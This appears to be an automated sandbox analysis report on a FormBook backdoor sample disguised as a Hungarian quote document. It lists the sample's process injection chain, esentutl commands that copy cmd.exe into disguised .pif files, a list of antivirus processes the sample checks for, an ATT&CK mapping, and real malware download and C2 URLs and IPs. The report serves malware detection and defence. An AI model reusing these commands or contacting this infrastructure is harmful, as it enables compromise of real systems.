          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"
          Source: explorer.exe, 00000006.00000002.4172198636.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4170358182.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
          Source: explorer.exe, 00000006.00000002.4169868345.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
          Source: explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4170358182.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4170358182.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_029A5ACC
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: GetLocaleInfoA, | 0_2_029AA7C4
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_029A5BD8
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: GetLocaleInfoA, | 0_2_029AA810
          Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029A920C GetLocalTime, | 0_2_029A920C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029AB78C GetVersionExA, | 0_2_029AB78C

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara match | File source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara match | File source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 1 Shared Modules | 1 Valid Accounts | 1 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 812 Process Injection | 1 Timestomp | NTDS | 234 System Information Discovery | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 341 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Rootkit | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 211 Masquerading | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 2 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 812 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
          Behavior Graph ID: 1553904 | Sample: #U00c1raj#U00e1nlat k#U00e9... | Startdate: 11/11/2024 | Architecture: WINDOWS | Score: 100
          Start
            DNS/IP: www.apaescortatings.xyz; www.9838.xyz (Performs DNS queries to domains with low reputation); 11 other IPs or domains
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 11 other signatures
            started: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
              DNS/IP: mbsngradnja.com 77.105.36.123, 49732, 49733, 80 ORIONTELEKOM-ASRS Serbia; voievodulgelu.ro 92.114.2.230, 49730, 49731, 80 DIALTELECOMRO Romania
              Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
              started: SndVol.exe
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
                injected: explorer.exe
                  Signatures: Uses netsh to modify the Windows network and firewall settings
                  started: netsh.exe
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
                    started: cmd.exe
                      started: conhost.exe
              started: cmd.exe
                started: esentutl.exe
                  dropped: C:\Users\Public\alpha.pif, PE32
                  Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                started: esentutl.exe
                  dropped: C:\Users\Public\xpha.pif, PE32
                started: conhost.exe

          Source | Detection | Scanner | Label
          #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | 47% | ReversingLabs | Win32.Backdoor.FormBook
          #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | 100% | Avira | HEUR/AGEN.1326052
          #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | 100% | Joe Sandbox ML |
          Source | Detection | Scanner | Label
          C:\Users\Public\alpha.pif | 0% | ReversingLabs |
          C:\Users\Public\xpha.pif | 0% | ReversingLabs |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label
          http://www.ental-implants-50062.bondReferer: | 0% | Avira URL Cloud | safe
          http://www.r-outsourcing-69869.bond/d05n/www.apaescortatings.xyz | 0% | Avira URL Cloud | safe
          http://www.upta.bio | 0% | Avira URL Cloud | safe
          http://www.ursing-caregiver-jobs-za-3.bond/d05n/ | 0% | Avira URL Cloud | safe
          http://www.trl-migrate.online/d05n/ | 0% | Avira URL Cloud | safe
          http://www.trl-migrate.online | 0% | Avira URL Cloud | safe
          http://voievodulgelu.ro/244_Rgzwnbqrkpnl | 0% | Avira URL Cloud | safe
          http://www.xc31.top/d05n/ | 0% | Avira URL Cloud | safe
          http://www.egakids.shopReferer: | 0% | Avira URL Cloud | safe
          http://www.atingdilse.site/d05n/www.joops.music | 0% | Avira URL Cloud | safe
          http://www.trl-migrate.onlineReferer: | 0% | Avira URL Cloud | safe
          http://www.xc31.top/d05n/www.ursing-caregiver-jobs-za-3.bond | 0% | Avira URL Cloud | safe
          http://www.apaescortatings.xyz/d05n/ | 0% | Avira URL Cloud | safe
          http://www.ybzert.online | 0% | Avira URL Cloud | safe
          http://mbsngradnja.com/244_Rgzwnbqrkpnv | 0% | Avira URL Cloud | safe
          http://www.joops.music | 0% | Avira URL Cloud | safe
          www.atingdilse.site/d05n/ | 0% | Avira URL Cloud | safe
          http://www.trl-migrate.online/d05n/www.r-outsourcing-69869.bond | 0% | Avira URL Cloud | safe
          http://www.ynapticshiftai.tech/d05n/ | 0% | Avira URL Cloud | safe
          http://voievodulgelu.ro/244_Rgzwnbqrkpn | 100% | Avira URL Cloud | malware
          http://mbsngradnja.com:80/244_Rgzwnbqrkpn | 100% | Avira URL Cloud | malware
          http://www.9838.xyz | 0% | Avira URL Cloud | safe
          http://www.egakids.shop/d05n/www.ental-implants-50062.bond | 0% | Avira URL Cloud | safe
          http://www.egakids.shop | 0% | Avira URL Cloud | safe
          http://www.ursing-caregiver-jobs-za-3.bond/d05n/www.trl-migrate.online | 0% | Avira URL Cloud | safe
          http://www.eanliving.site/d05n/ | 0% | Avira URL Cloud | safe
          http://www.ynapticshiftai.techReferer: | 0% | Avira URL Cloud | safe
          http://www.9838.xyz/d05n/ | 0% | Avira URL Cloud | safe
          http://www.ursing-caregiver-jobs-za-3.bond | 0% | Avira URL Cloud | safe
          http://mbsngradnja.com/244_Rgzwnbqrkpnb:$ | 0% | Avira URL Cloud | safe
          http://mbsngradnja.com/244_Rgzwnbqrkpn4W | 0% | Avira URL Cloud | safe
          http://www.atingdilse.siteReferer: | 0% | Avira URL Cloud | safe
          http://www.ynthia-mcc-lin-tick.linkReferer: | 0% | Avira URL Cloud | safe
          http://www.ybzert.onlineReferer: | 0% | Avira URL Cloud | safe
          http://www.ynthia-mcc-lin-tick.link/d05n/www.atingdilse.site | 0% | Avira URL Cloud | safe
          http://www.egos.design/d05n/ | 0% | Avira URL Cloud | safe
          http://www.egakids.shop/d05n/ | 0% | Avira URL Cloud | safe
          http://www.atingdilse.site/d05n/ | 0% | Avira URL Cloud | safe
          http://www.joops.music/d05n/www.upta.bio | 0% | Avira URL Cloud | safe
          http://www.9838.xyz/d05n/www.ybzert.online | 0% | Avira URL Cloud | safe
          http://www.eanliving.siteReferer: | 0% | Avira URL Cloud | safe
          http://mbsngradnja.com/244_Rgzwnbqrkpn | 100% | Avira URL Cloud | malware
          http://www.apaescortatings.xyzReferer: | 0% | Avira URL Cloud | safe
          http://www.egos.design | 0% | Avira URL Cloud | safe
          http://www.xc31.top | 0% | Avira URL Cloud | safe
          http://www.ynthia-mcc-lin-tick.link/d05n/ | 0% | Avira URL Cloud | safe
          http://www.upta.bio/d05n/ | 0% | Avira URL Cloud | safe
          http://www.ynapticshiftai.tech | 0% | Avira URL Cloud | safe
          http://www.ybzert.online/d05n/www.ynapticshiftai.tech | 0% | Avira URL Cloud | safe
          http://www.apaescortatings.xyz/d05n/www.ynthia-mcc-lin-tick.link | 0% | Avira URL Cloud | safe
          http://www.apaescortatings.xyz | 0% | Avira URL Cloud | safe
          http://www.atingdilse.site | 0% | Avira URL Cloud | safe
          http://www.ynapticshiftai.tech/d05n/www.eanliving.site | 0% | Avira URL Cloud | safe
          http://mbsngradnja.com/244_RgzwnbqrkpnZ | 0% | Avira URL Cloud | safe
          http://www.egos.design/d05n/www.xc31.top | 0% | Avira URL Cloud | safe
          http://www.eanliving.site | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          mbsngradnja.com | 77.105.36.123 | true | true | | unknown
          voievodulgelu.ro | 92.114.2.230 | true | true | | unknown
          www.egos.design | unknown | unknown | true | | unknown
          www.9838.xyz | unknown | unknown | true | | unknown
          www.trl-migrate.online | unknown | unknown | true | | unknown
          www.apaescortatings.xyz | unknown | unknown | true | | unknown
          www.joops.music | unknown | unknown | true | | unknown
          www.upta.bio | unknown | unknown | true | | unknown
          www.r-outsourcing-69869.bond | unknown | unknown | true | | unknown
          www.atingdilse.site | unknown | unknown | true | | unknown
          www.ursing-caregiver-jobs-za-3.bond | unknown | unknown | true | | unknown
          www.ynthia-mcc-lin-tick.link | unknown | unknown | true | | unknown
          www.xc31.top | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.atingdilse.site/d05n/ | true | Avira URL Cloud: safe | unknown
          http://voievodulgelu.ro/244_Rgzwnbqrkpn | true | Avira URL Cloud: malware | unknown
          http://mbsngradnja.com/244_Rgzwnbqrkpn | true | Avira URL Cloud: malware | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://aka.ms/odirmr | explorer.exe, 00000006.00000003.3492560819.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106881820.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.atingdilse.site/d05n/www.joops.music | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.upta.bio | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.xc31.top/d05n/ | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.ental-implants-50062.bondReferer: | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
          https://excel.office.com | explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://voievodulgelu.ro/244_Rgzwnbqrkpnl | #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000056B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.r-outsourcing-69869.bond/d05n/www.apaescortatings.xyz | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.trl-migrate.online/d05n/ | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
